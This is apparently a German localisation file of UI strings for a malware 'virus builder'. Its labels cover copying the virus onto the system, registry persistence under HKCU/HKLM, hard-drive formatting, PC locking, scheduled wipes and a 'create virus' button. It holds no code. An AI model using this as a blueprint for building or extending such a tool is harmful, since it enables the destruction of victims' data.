[headers]
header1=HDF Einstellungen
header2=Vor der Formatierung
header3=Nach der Formatierung
header4=Erstellen

[header1]
item1=Anwendungs Einstellungen
item2=Ordner Name :
item3=Kopiere den Virus auf die Festplatte.
item4=Kopiere den Virus auf das System.
item5=Symbol Einstellungen	
item6=Symbol Weg :
item7=Bild :

[header2]
item1=Eintrags Ordner Einstellungen
item2=Format pfad :
item3=Datei an HKEY_CURRENT_USER anhängen.
item4=Datei an HKEY_LOCAL_MACHINE anhängen.
item5=Aktivierungs Einstellungen.
item6=Festplatte formatieren.
item7=PC sperren.
item8=Monatlich formatieren.
item9=Datum :
item10=Jährlich formatieren.
item11=Datum :
item12=Monat :

[header3]
item1=Mitteilungs Einstellungen
item2=Mitteilung anzeigen

[header4]
item1=General Einstellungen
item2=Zustand :
item3=Erstellungs Einstellungen
item4=Ordner Größe :
item5=Klein
item6=Groß
item7=Erstellungsstand
item8=Um Virus zu erstellen den Knopf anklicken.
item9=Virus erstellen

[summary]
item1=Erstellungsbild
item2=Gespeichert :
item3=Ordner Größe :
item4=Warnung
item5=Die erstellte Datei im eigenen PC nicht öffnen!
item6=Neue Datei erstellen
item7=Verlassen

[language]
item1=Sprach Einstellungen
item2=Sprache :

[messages]
msg1=Virus wird erstellt...
msg2=Symbol zu groß. Anderes Symbol wählen.
msg3=Alle Felder ausfüllen.
msg4=Virus erstellt!
